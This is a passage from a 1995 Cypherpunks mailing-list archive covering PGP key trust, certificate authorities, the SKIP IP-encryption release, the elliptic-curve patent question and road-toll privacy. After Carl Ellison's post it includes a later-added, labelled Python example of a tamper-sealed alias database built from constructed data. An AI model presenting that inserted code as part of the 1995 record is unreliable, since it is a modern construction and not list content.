h/JLbhFkgYbzMGsVzpu20Ww0uOsOwxQR2ItLkaSlTG0O76rgATE2Cma9LEvdoque
LMgN/xg0GmaSHoecHLuKJxRz/1xreKODuai2FvndyjspfgO/H6zrQOfhsWn3qa6a
ZqnNaEY+kXw=
=cuUk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Wed, 29 Nov 1995 03:44:32 +0800
To: cypherpunks@toad.com
Subject: Re: PGP hooks for Pegasus Mail?
Message-ID: <199511281905.NAA03947@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


It is happening...about a week off from the first beta release.  Announcements 
will be posted to the Pegasus mail support lists and bit.listserv.pmail 
(as well as other appropriate posting spots).

>Anyone done anything regarding PGP hooks into Pegasus Mail?  I'm 
>running it at home now (SLIPped into my Linux box), and I'd like to 
>find a way to integrate PGP into Pegasus Mail.
>
>Thanks in advance for any replies...
> 
> Ed -

Namaste'

Kimberly Long
klong@phoenix.net

Standing on the bare ground...all mean egotism vanishes.  I become a
transparent eyeball; I am nothing; I see all; the currents of the
Universal Being circulate through me; I am part or particle of God.
~Ralph Waldo Emerson  )O( 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 29 Nov 1995 03:19:53 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511281032.CAA21495@jobe.shell.portal.com>
Message-ID: <199511281813.NAA12568@homeport.org>
MIME-Version: 1.0
Content-Type: text


| > Well, signed Alice posts have shown up, so we will just have to assume
| > that the above was a spoof and that the signed Alice posts are the
| > real ones, now won't we?
| 
| Perry.  Normally I try my best to ignore you.
| 
| But I will simply repeat, I have never signed a post, and have no 
| intention of beginning to sign any posts, until I establish a secure 
| machine in a secure complex that is dedicated to that purpose.


	When did PGP claim to be perfect?  It's not; and the point is
not to obtain 100% confidence in someone, but a useable level of
confidence.  If the remailer chains work, then it would be tough to
find out who you are.  If we do find out who you are, your integrity
shell will tell you that your PGP binary was tampered with.  If we
don't know who you are, then your machine is safe from just about
anything other than a thorough sweep of all the net connected users in
Canada.

	So, please explain the threat that causes you to think that
'pretty good' is worthless in this context.

Adam
-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 29 Nov 1995 04:44:03 +0800
To: bsdc@ai.mit.edu
Subject: e$: Moof! (Hettinga Speaks at Apple)
Message-ID: <v02120d02ace116e8b837@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


God help us all.

I've been invited to the CyberDog Coding Retreat next week at Apple
Computer in Cupertino. Getting flown out there is cool. Hanging with the
more clueful Mac Internet types and getting to kibbitz and watch (I like to
watch!) them code OpenDoc parts for the internet from 8AM to midnight plus,
subsisting on Dew and Pizza is really way cool. Even getting some
mac.cypherpunks in the door to code crypto parts is extremely cool. But...

They've asked me to give a "talk". All by myself. In an auditorium. With an
audience, I mean. With publicity. I feel like Hoffman in Rain Man...
V-E-R-N, Verrrn... More to the point, I feel like I'm tempting fate,
here...

Sooo. I've been told I can have friends in the audience. That's cool. As
many friends as I want. That's even cooler. I can even have reinforcements
up on the rostrum. That's extremely cool.

So, while I work on the "reinforcements up on the rostrum" part, *please*
come and help me explain this stuff to the rest of the Apple community.

I've appended the actual poster copy, with the relevant details, below.
The poster, and its copyright-violating picture of Grommit the Dog are also
found on the web at:

http://thumper.vmeng.com/pub/rah/talk.html

Cheers,
Bob Hettinga


-----------------------


Geodesic Software and Financial Cryptography for Dogs
Robert Hettinga
12 PM, Dec 6th 1995, Town Hall, R&D4


Robert Hettinga (really, nobody you ever
heard of), will talk about the internet as a geodesic network and
information surfactant, about OpenDoc as geodesic software and code
surfactant, about really frightening stuff like strong cryptography on
public networks and the four horsemen of the infoclypse, about digital cash
and bearer certificates, and finally, about why teaching CyberDog how to do
financial cryptography is so important.

See this 350lb guy jump up and down and blather on for at least an hour
about anonymous transactions, about the disappearance of the capital
markets as we know them, the rise and fall of the pyramid as communication
metaphor, and how to raise Bucky Fuller from the dead.

Learn why you should teach your code to surfact any application "suite" into
little bitty pieces, to send you cash in the mail no matter where you are,
and to make the whole status quo (everywhere!) disappear in a cloud of
self-organized chaos.

Cryptoanarchy. Right here in Cupertino, folks.

See you there...



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 29 Nov 1995 05:05:36 +0800
To: raph@c2.org
Subject: Re: The future will be easy to use
In-Reply-To: <Pine.SUN.3.91.951128113331.17420A@infinity.c2.org>
Message-ID: <9511282030.AA04051@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Tue, 28 Nov 1995 11:43:34 -0800 (PST)
>From: Raph Levien <raph@c2.org>

>> It would acquire a meaning by being associated with some message or set of
>> messages:
>> 
>> a) an attribute testimony (signed by someone with known authority to
>> 	specify such an attribute -- the equivalent of a certificate)
>
>This is the induction case, not the base case. It assumes that you've 
>already got a bunch of trusted public keys in your database. It also 
>assumes the willingness of the owners of those public keys to sign new 
>keys. See, now they've got the same problem of trying to determine 
>whether the key is valid. Turtles all the way down.

Of course.  This isn't the base case.  We would have some keys which I sign
based on my own personal knowledge; things handed to me by people I know;
some possibly published in the paper where the real key owner would see the
claim and be able to contest it.  PGP today comes shipped with some keys to
provide the base for a chain of key signatures, but there's no verification
of PRZ's or JIS's keys.  One has to prime the mesh somehow.

I personally prime it by having some keys (or fingerprints) exchanged face
to face with people I know -- and having others acquired by association
with signed messages (b).  I don't have any yet whose trust has been
acquired by attribution (a), since we don't have that machinery set up yet.

BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
is that I trust that key (by personal meeting, by attribution, by message
association, ...).  A signed attribute record would let me record that
information for myself as well as for others.

>> b) a set of messages signed by the key in question (tying the key to
>> 	the source material from which the user formed his/her impression
>> 	of the sender)
>
>There being no reason, of course, why Mallet couldn't just sign all that 
>stuff with his own signature. Here, you're relying on the ability of data 
>to authenticate itself.

Here I'm talking about people I "meet" and "get to know" based strictly on
my own e-mail conversations with them.  For such people, there is no other
evidence.  If it weren't for those messages, these people effectively
wouldn't exist in my world.  These messages define the people in question.

Stated another way:  I want to communicate with Alice.  I don't want to
communicate with Bob.  I've never met Alice but I have an address for her
and a public key.

	Alice --- Bob --- Carl

shows Bob as an active eavesdropper, controlling all of Alice's channels,
blocking release of her real key, announcing a key he controls under her
name to the rest of the world.  By contrast,

	Alice --- Bob --- Carl

shows Bob as Alice's secretary, who has been given the job, by Alice, of
reading all Alice's mail, choosing which to pass along to her and answering
all the others.  Alice has generated a key for herself and has given the
private key to Bob so that he can sign for her and read all her mail.
Alice could even have that key certified as hers within some massive X.509
hierarchy -- doing that before she gave the private key to Bob.

I know of no crypto protocol which will distinguish one from the other
unless I have a private channel to Alice at some time -- but that
contradicts the original assumption that I've never met her.

In both cases, the person I think of as Alice is really

	(Alice --- Bob) ---

and that's the "person" I learn to trust or not to trust.  That's the
"person" for whom I attach an alias to the public key.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLtxOlQXJENzYr45AQFw4gP/es2salfOBrsPW3X1d+NnsBTThKJSkTYP
yCp7YZ9iIgBXnV/rQ3TcZg2Gbts/QwpUrqN7fQQ+tNazMxqomd3+Iz+5HPTU2jc7
5rW8p/dyq1vKGDgy+M4ohTLE9XXVJLJo3AwpUJeAhqd/SAUiJPTpdgggotnXfAeF
wWovhe3nq+U=
=jpzx
-----END PGP SIGNATURE-----
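
Added example, not part of Carl Ellison's messages or of any mailer he mentions: a minimal alias database along the lines the two messages above describe, keyed by key fingerprint, recording how each key came to be trusted and the digests of its "defining messages", and sealed against tampering. The SHA-256 fingerprint, the HMAC seal, the passphrase and all names and sample bytes are assumptions constructed for illustration; signature verification of the defining messages is assumed to have been done by the mailer.

```python
import hashlib
import hmac
import json
import os

# How a key came to be trusted, per the second message above.
BASES = {"face-to-face", "attribution", "message-association"}


def fingerprint(pubkey: bytes) -> str:
    """Short identifier for a key (SHA-256 here: an assumption, not PGP's format)."""
    return hashlib.sha256(pubkey).hexdigest()[:32]


def _mac_key(passphrase: str, salt: bytes) -> bytes:
    # Derive the sealing key from the owner's passphrase.
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode(), salt, 100_000)


class AliasDB:
    def __init__(self):
        # fingerprint -> {"alias", "basis", "defining": [message digests]}
        self.entries = {}

    def _entry(self, pubkey: bytes):
        fp = fingerprint(pubkey)
        blank = {"alias": None, "basis": None, "defining": []}
        return fp, self.entries.setdefault(fp, blank)

    def add_defining_message(self, pubkey: bytes, message: bytes) -> None:
        """Tie a message (already verified under this key) to the key."""
        _, entry = self._entry(pubkey)
        entry["defining"].append(hashlib.sha256(message).hexdigest())

    def assign(self, pubkey: bytes, alias: str, basis: str) -> str:
        """Give the key a local name and record why it is trusted."""
        if basis not in BASES:
            raise ValueError("unknown trust basis: " + basis)
        fp, entry = self._entry(pubkey)
        for other_fp, other in self.entries.items():
            if other["alias"] == alias and other_fp != fp:
                raise ValueError("alias already names another key")
        entry["alias"], entry["basis"] = alias, basis
        return fp

    def key_for(self, alias: str):
        for fp, entry in self.entries.items():
            if entry["alias"] == alias:
                return fp
        return None

    def defining_messages(self, alias: str):
        """Call up the message digests that gave this alias its meaning."""
        fp = self.key_for(alias)
        return list(self.entries[fp]["defining"]) if fp else []

    def seal(self, passphrase: str) -> str:
        """Serialize with an HMAC tag so later edits on disk are detectable."""
        salt = os.urandom(16)
        body = json.dumps(self.entries, sort_keys=True)
        tag = hmac.new(_mac_key(passphrase, salt), body.encode(),
                       hashlib.sha256).hexdigest()
        return json.dumps({"salt": salt.hex(), "body": body, "tag": tag})

    @classmethod
    def load(cls, blob: str, passphrase: str) -> "AliasDB":
        outer = json.loads(blob)
        key = _mac_key(passphrase, bytes.fromhex(outer["salt"]))
        expected = hmac.new(key, outer["body"].encode(),
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, outer["tag"]):
            raise ValueError("alias database failed integrity check")
        db = cls()
        db.entries = json.loads(outer["body"])
        return db


def demo():
    # Constructed sample data; these byte strings stand in for real keys.
    alice_key = b"constructed public key bytes for Alice"
    mallet_key = b"constructed public key bytes for Mallet"
    db = AliasDB()
    db.add_defining_message(alice_key, b"constructed signed message no. 1")
    db.assign(alice_key, "Alice (list)", "message-association")
    blob = db.seal("constructed passphrase")

    restored = AliasDB.load(blob, "constructed passphrase")
    intact = restored.key_for("Alice (list)") == fingerprint(alice_key)

    # Someone with write access to the file rebinds the alias to another key.
    tampered = blob.replace(fingerprint(alice_key), fingerprint(mallet_key))
    try:
        AliasDB.load(tampered, "constructed passphrase")
        detected = False
    except ValueError:
        detected = True
    return intact, detected


if __name__ == "__main__":
    print(demo())
```

The seal only protects the stored bindings; as the second message argues, it says nothing about whether the entity behind the key is Alice alone or Alice plus whoever holds her private key.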




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 29 Nov 1995 05:15:04 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Draft paper on anonymity, E$ and other stuff
Message-ID: <Pine.SUN.3.91.951128155759.9479T-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain



Now available for download: a draft of my latest paper, Flood Control on
the Information Ocean: Living With Anonymity, Digital Cash, and
Distributed Databases. 

I'd like your comments please, especially if you can send them soon. The
paper is available in a postscript file (966K) or a compressed postscript
file (253 K) by clicking on links from my homepage:

http://www.law.miami.edu/~froomkin/ocean.ps

http://www.law.miami.edu/~froomkin/ocean.ps.Z

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 29 Nov 1995 05:36:43 +0800
To: cypherpunks@toad.com
Subject: (fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <v02120d00ace12b741277@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: www-buyinfo <www-buyinfo@allegra.att.com>
From: Andrew Barrett/CheckFree Corporation
  <Andrew_Barrett@checkfree.com>
Date: 28 Nov 95  9:32:28 EDT
Subject: Like FV with Crypto ... 'Cept Different ...
Mime-Version: 1.0

 SAN RAFAEL, Calif., Nov. 22 /PRNewswire/  -- SBT's
Internet Division today announced that its electronic storefront package,
WebTrader 2.0, will integrate with Checkfree's credit card processing
service providing a complete, secure Internet commerce solution.  The
combination of SBT's WebTrader and Checkfree's Electronic Payment Processing
service allows any company to sell products on the Internet, automate order
entry and fulfillment and receive credit card payments electronically.

<SNIP SRC="blah, blah,blah">PR balloon deflated</snip>

  The Internet commerce solution process will be initiated by a merchant
contacting an SBT Internet Business Consultant (IBC) who will install and
configure Web Trader and provide the client with the Checkfree Merchant
Application package.  The IBC will arrange for a Checkfree account manager
to be assigned to the account who will assist with the application process.
The IBC will then customize and modify the Web Trader application, and
tailor Checkfree's processing to the merchant's specific needs.  Once the
application has been processed and approved, the IBC will coordinate site
testing for credit card transactions.  At that point the merchant is
equipped to conduct business on the Internet.

  WebTrader is the most widely-installed Windows program that allows
businesses to create an electronic storefront with order forms for products
or services on the Web.  It automatically processes the orders and sends the
customer confirmation via e-mail.  WebTrader initiates and completes the
sales process by providing a direct, instantaneous connection between vendor
and customer, RSA Data Security's encryption software which keeps credit
card numbers and other sensitive data private once it is received by the
vendor's Web server.

  WebTrader includes several HTML templates for home pages and sales order
forms that are ready to run on the Web.  When a customer on the Web
completes a form, the information is sent to the vendor via Internet e-mail.
The vendor employs an integrated e-mail parsing program that automatically
transforms the message into a standard SBT Sales Orders' bid.  After the bid
is authorized, it is converted to a firm order and an e-mail message
confirming receipt of the order is sent via Internet to the customer.
WebTrader also includes the ability to capture and track other critical
business information such as sales leads, product registration and customer
surveys.

  WebTrader can be used as a stand-alone Internet application or in
conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
suggested retail price of $1,295.

->Finger abarrett@ee.net for Keyprint
->Public Key Coming Soon to a Keyserver Near You!

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nowhere@bsu-cs.bsu.edu>
Date: Wed, 29 Nov 1995 06:15:57 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511282157.QAA10096@bsu-cs.bsu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is this list archived so that I can try to look stuff up before asking 
stupid questions?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 30 Nov 1995 12:25:53 +0800
To: "P. Rajaram" <rajaram@morgan.com>
Subject: Re: Certificate Authorities?
In-Reply-To: <01BABCAF.9CDAE5C0@csasaki>
Message-ID: <30BBB178.267A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


We are looking at adding the ability for enterprise security
administrators to lock various parts of the Navigator configuration
so that the user can not change them, including stuff relating
to trust and certificates.  This functionality will not be in
2.0, but we do consider it important for certain customers.

	--Jeff

P. Rajaram wrote:
> Yes.  But...
> I deal with the security infrastructure for a large corporation.
> I want only security administrators to configure the list of acceptable CAs.
> I specifically do not want our users to be able to add new CAs
> to the list of trusted "approved" CAs.
> 
> The concern is that some users who are not crypto enthusiasts may be
> "social engineered" into adding a very liberal CA to their list.
> Once this happens, the browser's signature verification capability
> is totally compromised.
> 
> This is one of the reasons why PGP has not been adopted by many large
> companies.  In response, Viacrypt now seems to have a product that
> can restrict user modifications to the public keyring.
> 
> -raj

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smithmi@dev.prodigy.com (Michael Smith)
Date: Wed, 29 Nov 1995 06:51:45 +0800
To: Wei Dai <cypherpunks@toad.com
Subject: Re: Elliptic curves, patent status?
Message-ID: <199511282216.RAA17432@tinman.dev.prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm unclear about the patent status of elliptic curve 
systems. Are they covered by the Diffie-Hellman patent? 
That is, is the language of this patent broad enough to 
cover _all_ public-key systems, regardless of their 
mathematical basis? 

--Michael Smith
  smithmi@dev.prodigy.com

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: markson@osmosys.incog.com (Tom Markson)
Date: Wed, 29 Nov 1995 09:40:01 +0800
To: cypherpunks@toad.com
Subject: SKIP Source Release is out!
Message-ID: <9511290122.AA26147@monster.incog.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

Check out http://skip.incog.com.  We've released the source to the SKIP
key management and IP layer encryption package for SunOS 4.x.

Here's a piece of the README file:


	ALPHA 1 Release of SKIP Reference Source for SunOS 4.1.3
	--------------------------------------------------------

SKIP is a Key-management protocol for IP based protocols.  It is an 
acronym for Simple Key-management for Internet Protocols. SKIP is 
documented in the SKIP IETF IPSEC draft included in this directory 
as draft-ietf-ipsec-skip-05.txt.  The most recent SKIP draft is 
always available at http://skip.incog.com and the Internet-Drafts
directories.

>From this public domain source release, you can build a fully 
functional IP-layer encryption package which supports DES and 
Triple-DES for SunOS 4.1.3.  This means that every IP networked 
application can have its network traffic encrypted.   Unlike
application level encryption packages, this package encrypts 
IP packets.  Thus, applications do not need to be recompiled or 
modified to take advantage of encryption.

The SKIP source is possible through the efforts of engineers in Sun
Microsystems Internet Commerce Group.  The developers and designers
are Ashar Aziz, Tom Markson, Martin Patterson, Hemma Prafullchandra and
Joseph Reveane.  Linda Cavanaugh worked on the documentation.

The package compiles under both the SunPro compiler and GCC.  We expect 
that this release should port without too much pain to any operating 
system which uses BSD style networking (mbufs).  

A legal warning: Because this package contains strong encryption, the
Software must not be transferred to persons who are not US citizens or
permanent residents of the US, or exported outside the US (except
Canada) in any form (including by electronic transmission) without
prior written approval from the US Government. Non-compliance with
these restrictions constitutes a violation of the U.S. Export Control
Laws.

This source release may be used for both commercial and noncommercial 
purposes, subject to the restrictions described in the software and
patent license statements.  

Furthermore, Sun Microsystems has licensed the Stanford public key patents 
from Cylink Corp. which are available to users of this package on a royalty 
free basis. The patent statement is in README.PATENT.  Be sure to read this,
as it contains some restrictions and other important information.  

Also included in this release is a high speed Big Number package written 
by Colin Plumb. bnlib/legal.c contains Colin's software license statement. 

Features
--------
	1.  SKIP V2 compliant implementation using ESP encapsulation.
	2.  Support for DES/3DES for traffic and key encryption.
	3.  Diffie-Hellman Public Key Agreement based system.
	4.  Full Support for manual establishment of master keys.
	5.  Support for multiple NSIDs and multiple local certificates.
	6.  GUI tool for user friendly manipulation of access control lists
	    and key statistics.
	7.  Command line tools for manipulating access control lists, etc.
	8.  Implementation of the Certificate Discovery protocol fully
	    integrated into SKIP.
	9.  Implementation of X.509 public key certificates.
	10. Implementation of DSA signature algorithm for certificate
	    signatures.
	11. Implementation for MD2, MD5 and SHA message digest algorithms.
	12. Implementation of ASN.1 DER encoding/decoding.
	13. SunScreen(tm) SKIP compatibility mode.
	14. Implementation of hashed public keys as defined in the SKIP 
	    draft.  Implementation of programs to generate hashed public
	    keys.
	15. Certificate utilities to convert X.509 Certificates to hashed
	    keys and  print both X.509 and Hashed certificates.
	16. High performance Big Number library for Diffie-Hellman 
	    calculations.
	17. Implementation is effectively "public domain" and may be used both 
	    commercially and non-commercially.
	18. Patent Agreement with Cylink allows royalty-free use of the 
            Diffie-Hellman and other Stanford patents with this package for 
	    commercial and non-commercial use.  Read README.PATENT for 
	    some restrictions.
	19. Inclusion of prime generation program used to generate the 
	    primes in SKIP draft.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 29 Nov 1995 06:55:03 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Cypherpunk archives
Message-ID: <199511282224.RAA13088@homeport.org>
MIME-Version: 1.0
Content-Type: text


>Is this list archived so that I can try to look stuff up before asking 
>stupid questions?

see http://www.hks.net/cpunks/index.html

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Wed, 29 Nov 1995 06:48:43 +0800
To: cypherpunks@toad.com
Subject: Re: Archives?
Message-ID: <Pine.3.89.9511281718.C45949-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Anonymous wrote:

> Is this list archived so that I can try to look stuff up before asking 
> stupid questions?
 
<http://www.hks.net/cpunks/index.html>

You can run lycos searches on its contents.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martin Diehl" <mdiehl@dttus.com>
Date: Wed, 29 Nov 1995 07:44:57 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Archives [WAS: no subject]
Message-ID: <9510288176.AA817606611@cc1.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     On November 28, 1995:
     Anonymous <nowhere@bsu-cs.bsu.edu> at Internet-USA
     asked:
     
     > Is this list archived so that I can try to look stuff up before
     > asking stupid questions?
     
     Yes, you can find the archives at:
     
        http://www.hks.net/cpunks/index.html
     
     You should also read:
     
        http://www.oberlin.edu/~brchkind/cyphernomicon/
     
     If you ask, I have another 10-20 URL's related to this subject.
     
     Martin G. Diehl
     





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 29 Nov 1995 07:43:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <199511282157.QAA10096@bsu-cs.bsu.edu>
Message-ID: <199511282257.RAA00774@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> Is this list archived so that I can try to look stuff up before asking 
> stupid questions?

Yes. Check www.hks.net (I think -- maybe it's hks.com).

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 29 Nov 1995 09:05:29 +0800
To: cypherpunks@toad.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <ace0eae109021004d3af@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:48 PM 11/28/95, E. ALLEN SMITH wrote:
>From:   IN%"perry@piermont.com" 28-NOV-1995 02:02:17.85
>
>Indeed. It's the problem with innumeracy. People don't understand that
>if, say, a problem is O(2^N), and a problem of size 1000 requires a
>liter of fluid, a problem of size 2000 requires
>---------------------------
>        Now that I've looked at it a bit more, I would definitely agree...
>exponential growth is quite a function. Incidentally, talking about it in
>liters of fluid is probably not the best way to look at it, any more than

The reason we speak in terms of physical volumes of "Adleman computers" is
to make concrete the way things scale. If the amount of Adleman computers
needed to factor, say, a 2000-digit modulus (or some reasonably equivalent
Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of
them running for 100 years," then one has a pretty clear feel for just how
futile it is to ask about "But what about if we apply MASSIVE
PARALLELISM?!?!"

(There's a certain well-known person who frequently raises the issue of
"massive parallelism" on sci.crypt, each time revealing that he just
doesn't understand that 1024 or even a million processors will not "solve"
the problem for brute force attacks. Some people think there is something
_magical_ about "massive parallelism.")

>computer chips can be best defined in square centimeters. But that doesn't
>change the essential conclusion; it just alters how big of a problem you
>need to use. The lesson here, I believe, is to use as large of a key/etcetera
>as possible... something that should be news to none, even to novices like me.
>Never assume that something will require too much computing power, until the
>computing power needed is not doable in the universe. Then add some, since
>(for some problems) someone might figure out a clever way around them. I
>worry that factoring may be one of these.

I don't worry much about factoring breakthroughs. And I don't mean minor
improvements, which keep occurring: I mean major breakthroughs which would
make factoring a 2000-decimal-digit number "easy."

Practically speaking, snarfing private keys is a helluva lot easier, for
many reasons.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Wed, 29 Nov 1995 10:50:04 +0800
To: cypherpunks@toad.com
Subject: RISKS: Informed public opinion of automatic toll collection
Message-ID: <v0153050bace1773216cf@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Anonymity and privacy interest:

------------------------------

Date: Tue, 21 Nov 1995 15:07:48 -0800 (PST)
From: Phil Agre <pagre@weber.ucsd.edu>
Subject: Resistance to intelligent traffic

Public resistance to electronic road-use taxes is continuing to grow
worldwide.  Most recently, a panel of 14 laymen assembled by Teknologi
Naevnet (i.e., The Danish Board of Technology, Antonigade 4, DK-1106,
Denmark, +45 33 32 05 03 -- see report number 5/1995), having been presented
with arguments pro and con concerning "intelligent traffic" technologies,
concluded that it "does not see any substantial economic, environmental or
safety benefits from massive public investments in traffic informatics --
perhaps with the exception of public transport".  On the issue of safety,
for example, they accepted that some likely safety benefits existed, but
that they had to be weighed against other potential dangers, for example
that drivers' skills may deteriorate due to reliance on automation, and in
any event they concluded that if safety should be improved then much more
cost-effective measures were available anyway.  They also raised concerns
about privacy and emphasized that new legislation would have to regulate the
new databases that such systems would accumulate.

The report fits an emerging global pattern.  When electronic road tolls and
other forms of high technology that entail surveillance of citizens'
movements are implemented quietly, creating a fait accompli, citizens tend
to accept them fatalistically.  But when any sort of democratic procedure is
employed, public resistance is very stiff indeed.  This phenomenon suggests
two possible scenarios for the future:

 (1) Continued stealth implementation, leading to deepening public distrust
     of information technology and the organizations that control it.

 (2) Genuine public involvement in the social choices being made about
     "intelligent" roadway technologies, leading to legitimate decisions
     based on full public debate, and potentially as well to technological
     improvements (such as the use of digital cash and other technologies
     of anonymity) that deliver a broad range of functionality while
     responding appropriately to legitimate public concerns.

Which scenario occurs will depend on the political culture of each country.
More concretely, it will depend on the degree to which people are informed
about the issues, express their concerns, and ensure that the more legitimate
course is taken.

Phil Agre, UCSD

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 29 Nov 1995 22:42:20 +0800
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: Certificate Authorities?
In-Reply-To: <199511290139.UAA02214@cmyk.warwick.com>
Message-ID: <30BBC98D.3BD3@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Harry S. Hawk wrote:
> As a Cypherpunk, a reporter and a corporate user of java/hot
> java/netscape not only should you do that but have a way of locking in
> various class libs..  E.g.  if I want to change the security class
> (but don't want my users to do so..) there needs to be a way.. That
> SHOULD be in 2.0.

  This is all stuff we are looking at.  It will not be in 2.0 though.
There is a lot of functionality in 2.0 that should not have to wait
for this.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 29 Nov 1995 08:12:29 +0800
To: perry@piermont.com
Subject: Re: Directed Hamiltonian Path Problem
Message-ID: <01HY6QNMYGP08WYU3C@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"perry@piermont.com" 28-NOV-1995 02:02:17.85

Indeed. It's the problem with innumeracy. People don't understand that
if, say, a problem is O(2^N), and a problem of size 1000 requires a
liter of fluid, a problem of size 2000 requires 
---------------------------
	Now that I've looked at it a bit more, I would definitely agree...
exponential growth is quite a function. Incidentally, talking about it in
liters of fluid is probably not the best way to look at it, any more than
computer chips can be best defined in square centimeters. But that doesn't
change the essential conclusion; it just alters how big of a problem you
need to use. The lesson here, I believe, is to use as large of a key/etcetera
as possible... something that should be news to none, even to novices like me.
